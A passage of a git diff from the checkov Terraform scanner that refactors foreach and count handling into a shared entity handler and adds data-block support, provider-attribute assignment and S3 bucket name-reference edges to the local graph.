+class ForeachEntityHandler(ForeachAbstractHandler):
+    def __init__(self, local_graph: TerraformLocalGraph, block_type_to_handle: str) -> None:
+        super().__init__(local_graph)
+        self.block_type_to_handle = block_type_to_handle
+
+    def handle(self, resources_blocks: list[int]) -> None:
+        block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks)
+        self._create_new_resources(block_index_to_statement)
+
+    def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE:
+        if not resources_blocks:
+            return {}
+        block_index_to_statement: FOR_EACH_BLOCK_TYPE = {}
+        for block_index, block in enumerate(self.local_graph.vertices):
+            if block.block_type != self.block_type_to_handle or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes):
+                continue
+            foreach_statement = self._get_static_foreach_statement(block_index)
+            block_index_to_statement[block_index] = foreach_statement
+        blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None]
+        if blocks_to_render:
+            rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render)
+            block_index_to_statement.update(rendered_statements)
+        return block_index_to_statement
+
+    def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]:
+        attributes = self.local_graph.vertices[block_index].attributes
+        if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING):
+            return None
+        try:
+            if self._is_static_statement(block_index):
+                return self._handle_static_statement(block_index)
+            else:
+                return None
+        except Exception as e:
+            logging.info(
+                f"Cannot get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}")
+            return None
+
+    def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE:
+        rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {}
+        sub_graph = self._build_sub_graph(blocks_to_render)
+        self._render_sub_graph(sub_graph, blocks_to_render)
+        for block_idx in blocks_to_render:
+            if not self._is_static_statement(block_idx, sub_graph):
+                rendered_statements_by_idx[block_idx] = None
+            else:
+                rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph)
+        return rendered_statements_by_idx
+
+    def _create_new_resources_count(self, statement: int, block_idx: int) -> None:
+        main_resource = self.local_graph.vertices[block_idx]
+        for i in range(statement):
+            self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i)
+
+    def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock,
+                                     new_key: int | str, new_value: int | str) -> None:
+        self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx, foreach_idx=foreach_idx)
+
+    def _create_new_resource(
+            self,
+            main_resource: TerraformBlock,
+            new_value: int | str,
+            resource_idx: int,
+            foreach_idx: int,
+            new_key: int | str | None = None,
+    ) -> None:
+        new_resource = pickle_deepcopy(main_resource)
+        block_type, block_name = new_resource.name.split('.')
+        key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key)
+        config_attrs = new_resource.config.get(block_type, {}).get(block_name, {})
+
+        self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource)
+        idx_to_change = new_key or new_value
+        self._add_index_to_resource_block_properties(new_resource, idx_to_change)
+        if foreach_idx == 0:
+            self.local_graph.vertices[resource_idx] = new_resource
+        else:
+            self.local_graph.vertices.append(new_resource)
+
+    @staticmethod
+    def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None:
+        block_type, block_name = block.name.split('.')
+        idx_with_separator = ForeachEntityHandler._update_block_name_and_id(block, idx)
+        if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name):
+            block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name)
+
+    def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None:
+        for block_idx, statement in block_index_to_statement.items():
+            if not statement:
+                continue
+            if isinstance(statement, int):
+                self._create_new_resources_count(statement, block_idx)
+            else:
+                self._create_new_resources_foreach(statement, block_idx)
diff --git a/checkov/terraform/graph_builder/foreach/module_handler.py b/checkov/terraform/graph_builder/foreach/module_handler.py
index 566ca77b897..b84d8bc3493 100644
--- a/checkov/terraform/graph_builder/foreach/module_handler.py
+++ b/checkov/terraform/graph_builder/foreach/module_handler.py
@@ -35,6 +35,8 @@ def handle(self, modules_blocks: list[int]) -> None:
 
         while modules_to_render:
             modules_to_render = self._render_foreach_modules_by_levels(modules_blocks, modules_to_render, current_level)
+            self.local_graph._arrange_graph_data()
+            self.local_graph._build_edges()
 
     def _render_foreach_modules_by_levels(self, modules_blocks: list[int], modules_to_render: list[int],
                                           current_level: list[TFModule | None]) -> list[int]:
@@ -75,8 +77,16 @@ def _duplicate_module_with_for_each(self, module_idx: int, for_each: dict[str, A
     def _duplicate_module_with_count(self, module_idx: int, count: int) -> None:
         self._create_new_resources_count(count, module_idx)
 
+    def _get_rendered_modules(self, source_modules: list[TFModule | None]) -> list[int]:
+        """
+        Returns a list of module indexes that have been rendered in the current iteration.
+        """
+        modules_created_by_provided_source_packed = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in source_modules]
+        modules_created_by_provided_source = list(itertools.chain(*modules_created_by_provided_source_packed))  # list of lists -> single list
+        return modules_created_by_provided_source
+
     def _get_modules_to_render(self, current_level: list[TFModule | None]) -> list[int]:
-        rendered_modules = [self.local_graph.vertices_by_module_dependency[curr][BlockType.MODULE] for curr in current_level][0]
+        rendered_modules = self._get_rendered_modules(current_level)
         current_level.clear()
         for m_idx in rendered_modules:
             current_level.append(self._get_current_tf_module_object(m_idx))
@@ -190,7 +200,7 @@ def _create_new_module(
         main_resource_module_key = TFModule(
             path=new_resource.path,
             name=main_resource.name,
-            nested_tf_module=self._get_tf_module_with_no_foreach(new_resource.source_module_object)
+            nested_tf_module=new_resource.source_module_object
         )
 
         # Without making this copy the test don't pass, as we might access the data structure in the middle of an update
@@ -247,9 +257,17 @@ def _create_new_module_with_vertices(self, main_resource: TerraformBlock,
     def _add_new_vertices_for_module(self, new_module_key: TFModule | None, new_module_value: dict[str, list[int]],
                                      new_resource_vertex_idx: int) -> dict[str, list[int]]:
         new_vertices_module_value: dict[str, list[int]] = defaultdict(list)
+        seen_vertices = []
         for vertex_type, vertices_idx in new_module_value.items():
             for vertex_idx in vertices_idx:
                 module_vertex = self.local_graph.vertices[vertex_idx]
+                if module_vertex in seen_vertices:
+                    # Makes sure we won't mistakenly go over vertices we already copied.
+                    # This may happen when using nested modules with count>2,
+                    # as we might duplicate the previous count index resources mistakenly.
+                    # See issue https://github.com/bridgecrewio/checkov/issues/6068
+                    continue
+                seen_vertices.append(module_vertex)
                 new_vertex = pickle_deepcopy(module_vertex)
                 new_vertex.source_module_object = new_module_key
                 self.local_graph.vertices.append(new_vertex)
diff --git a/checkov/terraform/graph_builder/foreach/resource_handler.py b/checkov/terraform/graph_builder/foreach/resource_handler.py
index 8540d8d12b1..e08101f5634 100644
--- a/checkov/terraform/graph_builder/foreach/resource_handler.py
+++ b/checkov/terraform/graph_builder/foreach/resource_handler.py
@@ -1,110 +1,15 @@
 from __future__ import annotations
 
-import logging
-import typing
-from typing import Any, Optional
-
-from checkov.common.util.data_structures_utils import pickle_deepcopy
 from checkov.terraform.graph_builder.graph_components.block_types import BlockType
-from checkov.terraform.graph_builder.foreach.abstract_handler import ForeachAbstractHandler
-from checkov.terraform.graph_builder.foreach.consts import FOREACH_STRING, COUNT_STRING, FOR_EACH_BLOCK_TYPE
-from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock
-
-if typing.TYPE_CHECKING:
-    from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
-
-
-class ForeachResourceHandler(ForeachAbstractHandler):
-    def __init__(self, local_graph: TerraformLocalGraph) -> None:
-        super().__init__(local_graph)
-
-    def handle(self, resources_blocks: list[int]) -> None:
-        block_index_to_statement: FOR_EACH_BLOCK_TYPE = self._get_statements(resources_blocks)
-        self._create_new_resources(block_index_to_statement)
+from checkov.terraform.graph_builder.foreach.foreach_entity_handler import ForeachEntityHandler
 
-    def _get_statements(self, resources_blocks: list[int]) -> FOR_EACH_BLOCK_TYPE:
-        if not resources_blocks:
-            return {}
-        block_index_to_statement: FOR_EACH_BLOCK_TYPE = {}
-        for block_index, block in enumerate(self.local_graph.vertices):
-            if block.block_type != BlockType.RESOURCE or not (FOREACH_STRING in block.attributes or COUNT_STRING in block.attributes):
-                continue
-            foreach_statement = self._get_static_foreach_statement(block_index)
-            block_index_to_statement[block_index] = foreach_statement
-        blocks_to_render = [block_idx for block_idx, statement in block_index_to_statement.items() if statement is None]
-        if blocks_to_render:
-            rendered_statements: FOR_EACH_BLOCK_TYPE = self._handle_dynamic_statement(blocks_to_render)
-            block_index_to_statement.update(rendered_statements)
-        return block_index_to_statement
+from typing import TYPE_CHECKING
 
-    def _get_static_foreach_statement(self, block_index: int) -> Optional[list[str] | dict[str, Any] | int]:
-        attributes = self.local_graph.vertices[block_index].attributes
-        if not attributes.get(FOREACH_STRING) and not attributes.get(COUNT_STRING):
-            return None
-        try:
-            if self._is_static_statement(block_index):
-                return self._handle_static_statement(block_index)
-            else:
-                return None
-        except Exception as e:
-            logging.info(
-                f"Cant get foreach statement for block: {self.local_graph.vertices[block_index]}, error: {str(e)}")
-            return None
-
-    def _handle_dynamic_statement(self, blocks_to_render: list[int]) -> FOR_EACH_BLOCK_TYPE:
-        rendered_statements_by_idx: FOR_EACH_BLOCK_TYPE = {}
-        sub_graph = self._build_sub_graph(blocks_to_render)
-        self._render_sub_graph(sub_graph, blocks_to_render)
-        for block_idx in blocks_to_render:
-            if not self._is_static_statement(block_idx, sub_graph):
-                rendered_statements_by_idx[block_idx] = None
-            else:
-                rendered_statements_by_idx[block_idx] = self._handle_static_statement(block_idx, sub_graph)
-        return rendered_statements_by_idx
-
-    def _create_new_resources_count(self, statement: int, block_idx: int) -> None:
-        main_resource = self.local_graph.vertices[block_idx]
-        for i in range(statement):
-            self._create_new_resource(main_resource, i, resource_idx=block_idx, foreach_idx=i)
-
-    def _create_new_resource(
-            self,
-            main_resource: TerraformBlock,
-            new_value: int | str,
-            resource_idx: int,
-            foreach_idx: int,
-            new_key: int | str | None = None,
-    ) -> None:
-        new_resource = pickle_deepcopy(main_resource)
-        block_type, block_name = new_resource.name.split('.')
-        key_to_val_changes = self._build_key_to_val_changes(main_resource, new_value, new_key)
-        config_attrs = new_resource.config.get(block_type, {}).get(block_name, {})
-
-        self._update_foreach_attrs(config_attrs, key_to_val_changes, new_resource)
-        idx_to_change = new_key or new_value
-        self._add_index_to_resource_block_properties(new_resource, idx_to_change)
-        if foreach_idx == 0:
-            self.local_graph.vertices[resource_idx] = new_resource
-        else:
-            self.local_graph.vertices.append(new_resource)
+if TYPE_CHECKING:
+    from checkov.terraform.graph_builder.local_graph import TerraformLocalGraph
 
-    def _create_new_foreach_resource(self, block_idx: int, foreach_idx: int, main_resource: TerraformBlock,
-                                     new_key: int | str, new_value: int | str) -> None:
-        self._create_new_resource(main_resource, new_value, new_key=new_key, resource_idx=block_idx,
-                                  foreach_idx=foreach_idx)
 
-    @staticmethod
-    def _add_index_to_resource_block_properties(block: TerraformBlock, idx: str | int) -> None:
-        block_type, block_name = block.name.split('.')
-        idx_with_separator = ForeachResourceHandler._update_block_name_and_id(block, idx)
-        if block.config.get(block_type) and block.config.get(block_type, {}).get(block_name):
-            block.config[block_type][f"{block_name}[{idx_with_separator}]"] = block.config[block_type].pop(block_name)
+class ForeachResourceHandler(ForeachEntityHandler):
 
-    def _create_new_resources(self, block_index_to_statement: FOR_EACH_BLOCK_TYPE) -> None:
-        for block_idx, statement in block_index_to_statement.items():
-            if not statement:
-                continue
-            if isinstance(statement, int):
-                self._create_new_resources_count(statement, block_idx)
-            else:
-                self._create_new_resources_foreach(statement, block_idx)
+    def __init__(self, local_graph: TerraformLocalGraph) -> None:
+        super().__init__(local_graph, BlockType.RESOURCE)
diff --git a/checkov/terraform/graph_builder/foreach/utils.py b/checkov/terraform/graph_builder/foreach/utils.py
new file mode 100644
index 00000000000..604b8d709ce
--- /dev/null
+++ b/checkov/terraform/graph_builder/foreach/utils.py
@@ -0,0 +1,32 @@
+from __future__ import annotations
+
+from typing import Optional
+
+FOREACH_KEY_SEPERATOR = '["'
+FOREACH_KEY_ENDER = '"]'
+COUNT_KEY_SEPERATOR = "["
+COUNT_KEY_ENDER = "]"
+
+
+def get_terraform_foreach_or_count_key(resource_id: str) -> Optional[str]:
+    sanitized_id = get_sanitized_terraform_resource_id(resource_id)
+    if sanitized_id == resource_id:
+        return None
+    key = resource_id.split(sanitized_id)[-1]
+    while key.startswith(FOREACH_KEY_SEPERATOR) and key.endswith(FOREACH_KEY_ENDER):
+        key = key[2:-2]
+    while key.startswith(COUNT_KEY_SEPERATOR) and key.endswith(COUNT_KEY_ENDER):
+        key = key[1:-1]
+    return key
+
+
+def get_sanitized_terraform_resource_id(resource_id: str) -> str:
+    if FOREACH_KEY_SEPERATOR in resource_id:
+        original_id_parts = resource_id.split(FOREACH_KEY_SEPERATOR, maxsplit=1)
+        original_resource_name = original_id_parts[-2]  # As the last item will be the key itself,
+        return original_resource_name  # This will be the resource id before the foreach key was added
+    elif COUNT_KEY_SEPERATOR in resource_id:
+        original_id_parts = resource_id.split(COUNT_KEY_SEPERATOR)
+        original_resource_name = original_id_parts[-2]
+        return original_resource_name
+    return resource_id
diff --git a/checkov/terraform/graph_builder/graph_components/module.py b/checkov/terraform/graph_builder/graph_components/module.py
index 8b67f9cb1e4..76231fb7ece 100644
--- a/checkov/terraform/graph_builder/graph_components/module.py
+++ b/checkov/terraform/graph_builder/graph_components/module.py
@@ -7,6 +7,7 @@
 
 from checkov.common.typing import TFDefinitionKeyType
 from checkov.common.util.data_structures_utils import pickle_deepcopy
+from checkov.terraform import TFDefinitionKey
 from checkov.terraform.graph_builder.graph_components.block_types import BlockType
 from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock
 from checkov.terraform.parser_functions import handle_dynamic_values
@@ -34,6 +35,7 @@ def __init__(
         self.resources_types: Set[str] = set()
         self.source_dir = source_dir
         self.render_dynamic_blocks_env_var = os.getenv('CHECKOV_RENDER_DYNAMIC_MODULES', 'True')
+        self.temp_tf_definition: dict[TFDefinitionKey, dict[str, Any]] = {}
 
     def __eq__(self, other: object) -> bool:
         if not isinstance(other, Module):
diff --git a/checkov/terraform/graph_builder/local_graph.py b/checkov/terraform/graph_builder/local_graph.py
index a0491a44926..a9560feb947 100644
--- a/checkov/terraform/graph_builder/local_graph.py
+++ b/checkov/terraform/graph_builder/local_graph.py
@@ -1,11 +1,12 @@
 from __future__ import annotations
 
+import json
 import logging
 import os
 from collections import defaultdict
 from functools import partial
 from pathlib import Path
-from typing import List, Optional, Union, Any, Dict, overload, TypedDict
+from typing import List, Optional, Union, Any, Dict, overload, TypedDict, cast
 
 import checkov.terraform.graph_builder.foreach.consts
 from checkov.common.graph.graph_builder import Edge
@@ -14,11 +15,12 @@
 from checkov.common.graph.graph_builder.local_graph import LocalGraph
 from checkov.common.graph.graph_builder.utils import calculate_hash, join_trimmed_strings, filter_sub_keys
 from checkov.common.runners.base_runner import strtobool
+from checkov.common.typing import TFDefinitionKeyType
 from checkov.common.util.data_structures_utils import pickle_deepcopy
 from checkov.common.util.type_forcers import force_int
 from checkov.terraform.graph_builder.foreach.builder import ForeachBuilder
 from checkov.terraform.graph_builder.variable_rendering.vertex_reference import TerraformVertexReference
-from checkov.terraform.modules.module_objects import TFModule
+from checkov.terraform.modules.module_objects import TFModule, TFDefinitionKey
 from checkov.terraform.context_parsers.registry import parser_registry
 from checkov.terraform.graph_builder.graph_components.block_types import BlockType
 from checkov.terraform.graph_builder.graph_components.blocks import TerraformBlock
@@ -29,14 +31,18 @@
     get_referenced_vertices_in_value,
     attribute_has_nested_attributes,
     remove_index_pattern_from_str,
-    join_double_quote_surrounded_dot_split,
-)
+    join_double_quote_surrounded_dot_split, )
+from checkov.terraform.graph_builder.foreach.utils import get_terraform_foreach_or_count_key, \
+    get_sanitized_terraform_resource_id
 from checkov.terraform.graph_builder.utils import is_local_path
-from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer
-
+from checkov.terraform.graph_builder.variable_rendering.renderer import TerraformVariableRenderer, \
+    LEFT_BRACKET_WITH_QUOTATION, RIGHT_BRACKET_WITH_QUOTATION, LEFT_BRACKET, RIGHT_BRACKET, DOLLAR_PREFIX, RIGHT_CURLY, LEFT_CURLY
+from checkov.common.util.consts import RESOLVED_MODULE_ENTRY_NAME
 
 MODULE_RESERVED_ATTRIBUTES = ("source", "version")
 CROSS_VARIABLE_EDGE_PREFIX = '[cross-variable] '
+S3_BUCKET_RESOURCE_NAME = "aws_s3_bucket"
+S3_BUCKET_REFERENCE_ATTRIBUTE = "bucket"
 
 
 class Undetermined(TypedDict):
@@ -45,6 +51,11 @@ class Undetermined(TypedDict):
     variable_vertex_id: int
 
 
+class S3ConnectedResources(TypedDict):
+    bucket_resource_index: int | None
+    referenced_vertices: List[Edge]
+
+
 class TerraformLocalGraph(LocalGraph[TerraformBlock]):
     def __init__(self, module: Module) -> None:
         super().__init__()
@@ -58,7 +69,11 @@ def __init__(self, module: Module) -> None:
         self.vertices_by_module_dependency: Dict[TFModule | None, Dict[str, List[int]]] = defaultdict(partial(defaultdict, list))
         self.enable_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_FOREACH_HANDLING', 'True'))
         self.enable_modules_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_MODULES_FOREACH_HANDLING', 'True'))
-        self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: []}
+        self.enable_datas_foreach_handling = strtobool(os.getenv('CHECKOV_ENABLE_DATAS_FOREACH_HANDLING', 'False'))
+        self.foreach_blocks: Dict[str, List[int]] = {BlockType.RESOURCE: [], BlockType.MODULE: [], BlockType.DATA: []}
+
+        # Important for foreach performance, see issue https://github.com/bridgecrewio/checkov/issues/6068
+        self._vertex_path_to_realpath_cache: Dict[str, str] = {}
 
     def build_graph(self, render_variables: bool) -> None:
         self._create_vertices()
@@ -66,7 +81,7 @@ def build_graph(self, render_variables: bool) -> None:
         self._build_edges()
         logging.info(f"[TerraformLocalGraph] created {len(self.edges)} edges")
         if (self.enable_foreach_handling or self.enable_modules_foreach_handling) \
-                and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE]):
+                and (self.foreach_blocks[BlockType.RESOURCE] or self.foreach_blocks[BlockType.MODULE] or self.foreach_blocks[BlockType.DATA]):
             try:
                 logging.info('[TerraformLocalGraph] start handling foreach')
                 foreach_builder = ForeachBuilder(self)
@@ -78,6 +93,7 @@ def build_graph(self, render_variables: bool) -> None:
                 logging.info(f'Failed to process foreach handling, error: {str(e)}')
 
         self.calculate_encryption_attribute(ENCRYPTION_BY_RESOURCE_TYPE)
+        self._connect_module_provider()
         if render_variables:
             logging.info(f"Rendering variables, graph has {len(self.vertices)} vertices and {len(self.edges)} edges")
             renderer = TerraformVariableRenderer(self)
@@ -89,6 +105,11 @@ def build_graph(self, render_variables: bool) -> None:
                 edges_count = len(self.edges)
                 self._build_cross_variable_edges()
                 logging.info(f"Found {len(self.edges) - edges_count} cross variable edges")
+            # building S3 edges by name for terraform graph
+            logging.info("Building S3 edges name references")
+            edges_count = len(self.edges)
+            self._build_s3_name_reference_edges()
+            logging.info(f"Found {len(self.edges) - edges_count} S3 name references edges")
         else:
             self.update_vertices_fields()
 
@@ -96,6 +117,10 @@ def update_vertices_fields(self) -> None:
         # Important to keep those 2 functions together, as the first affects the calculation of the second
         self._update_vertices_breadcrumbs_and_module_connections()
         self._update_nested_modules_address()
+        try:
+            self._add_provider_attr_to_resources()
+        except Exception as e:
+            logging.info(f'Failed to add provider attributes to resources, error: {str(e)}')
 
     def _create_vertices(self) -> None:
         logging.info("Creating vertices")
@@ -105,7 +130,7 @@ def _create_vertices(self) -> None:
             self._add_block_data_to_graph(i, block)
             if self.enable_foreach_handling and (
                     checkov.terraform.graph_builder.foreach.consts.FOREACH_STRING in block.attributes or checkov.terraform.graph_builder.foreach.consts.COUNT_STRING in block.attributes) \
-                    and block.block_type in (BlockType.MODULE, BlockType.RESOURCE):
+                    and block.block_type in (BlockType.MODULE, BlockType.RESOURCE, BlockType.DATA):
                 self.foreach_blocks[block.block_type].append(i)
 
     def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None:
@@ -122,6 +147,102 @@ def _add_block_data_to_graph(self, idx: int, block: TerraformBlock) -> None:
         self.in_edges[idx] = []
         self.out_edges[idx] = []
 
+    def _add_provider_attr_to_resources(self) -> None:
+        """
+            Assign provider attributes to resource vertices in the Terraform configuration.
+
+            This function iterates through all vertices, and for each vertex that is of the
+            `RESOURCE` block type, it attempts to determine and assign the appropriate
+            provider based on the vertex's attributes and the module's temporary Terraform
+            definitions.
+
+            The function performs the following steps:
+            1. Iterates over each vertex in `self.vertices`.
+            2. Checks if the vertex's `block_type` is `RESOURCE`.
+            3. Determines the path for the Terraform definition.
+            4. Checks for the presence of a provider in the vertex's attributes.
+            5. If no provider is found, checks in the module's temporary Terraform definition.
+            6. If still no provider is found, iterates through nested modules to find a provider.
+            7. Assigns the provider fields to the vertex once a provider is determined.
+        """
+        for vertex in self.vertices:
+            if vertex.block_type == BlockType.RESOURCE:
+                path_for_tf_definition = TFDefinitionKey(file_path=vertex.path, tf_source_modules=vertex.source_module_object)
+                if BlockType.PROVIDER in vertex.attributes:
+                    provider = self._get_the_default_provider(vertex.attributes[BlockType.PROVIDER], path_for_tf_definition)
+                    self._assign_provider_fields(vertex, provider)
+                elif BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, {}):
+                    provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(path_for_tf_definition, {}).get(BlockType.PROVIDER, []), path_for_tf_definition, is_same_file=True)
+                    v_name = vertex.name.split('.')
+                    provider_name = vertex.config[v_name[0]][v_name[1]][CustomAttributes.TF_RESOURCE_ADDRESS].replace(vertex.name, provider_name)
+                    self._assign_provider_fields(vertex, provider_name)
+                else:
+                    while path_for_tf_definition.tf_source_modules:
+                        if self.module.temp_tf_definition and path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(path_for_tf_definition, ''):
+                            module = [m for m in self.module.temp_tf_definition.get(path_for_tf_definition).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name]  # type:ignore
+                            provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module)
+                            self._assign_provider_fields(vertex, provider_name)
+                            break
+                        elif path_for_tf_definition.tf_source_modules and BlockType.PROVIDER in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}):
+                            if vertex.source_module_object and vertex.source_module_object.nested_tf_module:
+                                module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.nested_tf_module.name]  # type:ignore
+                                provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module)
+                                self._assign_provider_fields(vertex, provider_name)
+                            else:
+                                module = [m for m in self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path)).get(BlockType.MODULE) if list(m.keys())[0] == vertex.source_module_object.name]  # type:ignore
+                                provider_name = self._get_the_default_provider(self.module.temp_tf_definition.get(TFDefinitionKey(path_for_tf_definition.tf_source_modules.path), {}).get(BlockType.PROVIDER, []), path_for_tf_definition, module=module)
+                                self._assign_provider_fields(vertex, provider_name)
+                            break
+                        else:
+                            path_for_tf_definition = TFDefinitionKey(tf_source_modules=path_for_tf_definition.tf_source_modules.nested_tf_module, file_path=path_for_tf_definition.tf_source_modules.path)
+
+    @staticmethod
+    def _assign_provider_fields(vertex: TerraformBlock, provider_name: str) -> None:
+        vertex.attributes[CustomAttributes.PROVIDER_ADDRESS] = provider_name
+        v_name = vertex.name.split('.')
+        vertex.config[v_name[0]][v_name[1]][CustomAttributes.PROVIDER_ADDRESS] = provider_name
+
+    def _get_provider_address(self, path_for_tf_definition: TFDefinitionKeyType) -> list[int] | None:
+        if isinstance(path_for_tf_definition, TFDefinitionKey):
+            return self.vertices_by_module_dependency[path_for_tf_definition.tf_source_modules].get(BlockType.PROVIDER)
+        return None
+
+    def _get_the_default_provider(
+            self,
+            providers: list[dict[str, dict[str, Any]] | str],
+            path_for_tf_definition: TFDefinitionKeyType,
+            module: Optional[list[dict[str, Any]]] = None,
+            is_same_file: bool = False
+    ) -> str:
+        provider_address = self._get_provider_address(path_for_tf_definition)
+        if module and len(module) > 0:
+            module_providers = module[0][list(module[0].keys())[0]].get('providers', [''])[0]
+            if module_providers:
+                for _, m_alias in module_providers.items():
+                    if not provider_address:
+                        return cast(str, module_providers[list(module_providers.keys())[0]].replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, ""))
+                    else:
+                        for p_address in provider_address:
+                            if m_alias.replace(DOLLAR_PREFIX, "").replace(LEFT_CURLY, "").replace(RIGHT_CURLY, "") == self.vertices[p_address].name:
+                                return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS))
+
+        if isinstance(providers[0], str):
+            for provider in providers:
+                if provider_address:
+                    for address in provider_address:
+                        if self.vertices[address].name == provider:
+                            return cast(str, self.vertices[address].config[list(self.vertices[address].config)[0]].get(CustomAttributes.TF_RESOURCE_ADDRESS))
+        else:
+            for provider in providers:
+                provider_name = list(provider.keys())[0]  # type:ignore
+                if 'alias' not in provider[provider_name]:
+                    if provider_address and not is_same_file:
+                        for p_address in provider_address:
+                            if self.vertices[p_address].name == provider_name:
+                                return cast(str, self.vertices[p_address].config[list(self.vertices[p_address].config.keys())[0]][CustomAttributes.TF_RESOURCE_ADDRESS])
+                    return f'{provider_name}.default'
+        return ''
+
     def _arrange_graph_data(self) -> None:
         # reset all the relevant data
         self.vertices_by_block_type = defaultdict(list)
@@ -192,7 +313,7 @@ def _build_edges_for_vertex(self, origin_node_index: int, vertex: TerraformBlock
                 resources_types=resources_types,
             )
             for vertex_reference in referenced_vertices:
-                # for certain blocks such as data and resource, the block name is composed from several parts.
+                # for certain blocks such as data and resource, the block name is composed of several parts.
                 # the purpose of the loop is to avoid not finding the node if the name has several parts
                 sub_values = [remove_index_pattern_from_str(sub_value) for sub_value in vertex_reference.sub_parts]
                 for i in range(len(sub_values)):
@@ -283,6 +404,32 @@ def _get_target_variables(self, vertex: TerraformBlock, dest_module_path: str) -
             if self.get_dirname(self.vertices[index].path) == dest_module_path
         ]
 
+    def _connect_module_provider(self) -> None:
+        for origin_node_index, referenced_vertices in self.out_edges.items():
+            if not referenced_vertices:
+                continue
+            vertex = self.vertices[origin_node_index]
+            # if we have an edge of module->provider we need to connect that modules' resources to the provider
+            if vertex.block_type == BlockType.MODULE:
+                try:
+                    tf_def = vertex.config.get(vertex.name, {}).get(RESOLVED_MODULE_ENTRY_NAME)
+                    if tf_def and isinstance(tf_def, list):
+                        if isinstance(tf_def[0], str):
+                            definition = json.loads(tf_def[0])
+                            tf_module = TFDefinitionKey.from_json(definition).tf_source_modules
+                        else:
+                            tf_module = tf_def[0].tf_source_modules
+                        # get all resources connected to module
+                        resources = self.vertices_by_module_dependency[tf_module].get("resource")
+                        if resources:
+                            # search for provider vertices in the referenced vertices
+                            for e in referenced_vertices:
+                                if self.vertices[e.dest].block_type == BlockType.PROVIDER:
+                                    for resource in resources:
+                                        self.create_edge(resource, e.dest, e.label)
+                except Exception as e:
+                    logging.warning(f"Failed in connecting module resources to provider due to {e}")
+
     def _build_cross_variable_edges(self) -> None:
         aliases = self._get_aliases()
         resources_types = self.get_resources_types_in_graph()
@@ -293,6 +440,34 @@ def _build_cross_variable_edges(self) -> None:
                 modules = vertex.breadcrumbs.get(CustomAttributes.SOURCE_MODULE, [])
                 self._build_edges_for_vertex(origin_node_index, vertex, aliases, resources_types, True, modules)
 
+    def _build_s3_name_reference_edges(self) -> None:
+        # Supporting reference by name of S3 bucket
+        resources_types = self.get_resources_types_in_graph()
+        if S3_BUCKET_RESOURCE_NAME not in resources_types:
+            return
+        # Find all the edges leading to S3 bucket and their references
+        s3_buckets_mapping: Dict[int, S3ConnectedResources] = {}
+        for origin_node_index, referenced_vertices in self.out_edges.items():
+            vertex = self.vertices[origin_node_index]
+            if vertex.block_type != BlockType.RESOURCE:
+                continue
+            for referenced_vertice in referenced_vertices:
+                if referenced_vertice.label == S3_BUCKET_REFERENCE_ATTRIBUTE:
+                    current = s3_buckets_mapping.get(referenced_vertice.dest, {"bucket_resource_index": None, "referenced_vertices": list()})
+                    if vertex.id.startswith(f"{S3_BUCKET_RESOURCE_NAME}."):
+                        current["bucket_resource_index"] = origin_node_index
+                    else:
+                        current["referenced_vertices"].append(referenced_vertice)
+                    s3_buckets_mapping[referenced_vertice.dest] = current
+
+        # Create new edges of the found connections
+        for destination, mapping in s3_buckets_mapping.items():
+            if self.vertices[destination].block_type in [BlockType.VARIABLE, BlockType.LOCALS]:
+                if mapping["bucket_resource_index"] is None:
+                    continue
+                for reference_vertex in mapping["referenced_vertices"]:
+                    self.create_edge(mapping["bucket_resource_index"], reference_vertex.origin, S3_BUCKET_REFERENCE_ATTRIBUTE, True)
+
     def create_edge(self, origin_vertex_index: int, dest_vertex_index: int, label: str,
